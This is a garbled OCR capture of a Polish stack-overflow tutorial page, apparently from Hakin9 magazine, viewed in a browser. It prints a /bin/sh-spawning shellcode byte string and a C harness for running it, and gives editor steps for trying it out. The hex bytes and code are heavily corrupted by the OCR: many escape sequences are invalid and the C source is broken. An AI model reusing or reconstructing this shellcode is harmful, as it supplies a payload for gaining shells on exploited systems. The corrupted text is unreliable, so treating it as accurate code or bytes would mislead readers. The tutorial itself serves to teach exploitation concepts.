31 copy pl

^    Przepełnianie stosu po<J Umksem »86 - Mozilla Fiiebird

Przepełnianie słosu pod Linuksem *86 MozilU Firebiid

J file 7//ram di s k'bom ołiak. *og'Desk l cpi*t u tonaŁ^rrxk!x. htm 1	- a

iji Hakin9 (J, Aurox.org Lj i-*^nux P*® magazne U, Unux for beginncrs U PHP Solutions lj Software 2.0 [_j Bugtraq tn Pdish

EAe Edit Y»w Co Bookmaiks Ioołs bdp

*) - > M*

(31) Zaczniemy od przyjrzenia sic szelkodowi, który znaleźliśmy w Internecie. Szelkod ten - jak twierdzi jego twórca - powoduje uruchomienie powłoki /buVsh.

\xeb\xlf \ x5«?\x89\x76\xO$\xJl\xcO\xlMl\x46\x07\x89\x4d\xOc\xbO\xOb \x89\xf3\x8d\x4c\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd \x80\xe8\xdc\xff\xff\xf t/bin/«h

Sprawdźmy, co naprawdę robi szefcod. W tym celu skompilujmy i uruchommy program shcNcpdcJfrsU

riAino t char fheUcodet
••\x«b\x 1 f \x5« ^M\x89\xf3\x8d ^M\x80\x«*8\xdc	\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"| \x4e\x0 8\x8d\x36\xOc\xcd\xBO\x^^xdb\x89\xd8\x40\xcd*j
voidl*ptr) 0;| ptr • shellcode

D

Zaznacz powyższy fragment kodu, nastepnie w konsoli otwórz do edycji plik sheAcodc_fesr.c:

$ i»c shelłcode.teBt.c

Wklej zaznaczony kod QStati|+środkowy przycisk myszy). Uwaga: jeśli me masz myszy z trzema przyciskami, z^mast przycisku środkowego możesz równocześnie wcisnąć przycisk lewy i prawy. Zapisz edytowany pik wciskając \FĄ, nas tęp me wyjdź z edytora wciskane [F1(Ą.

i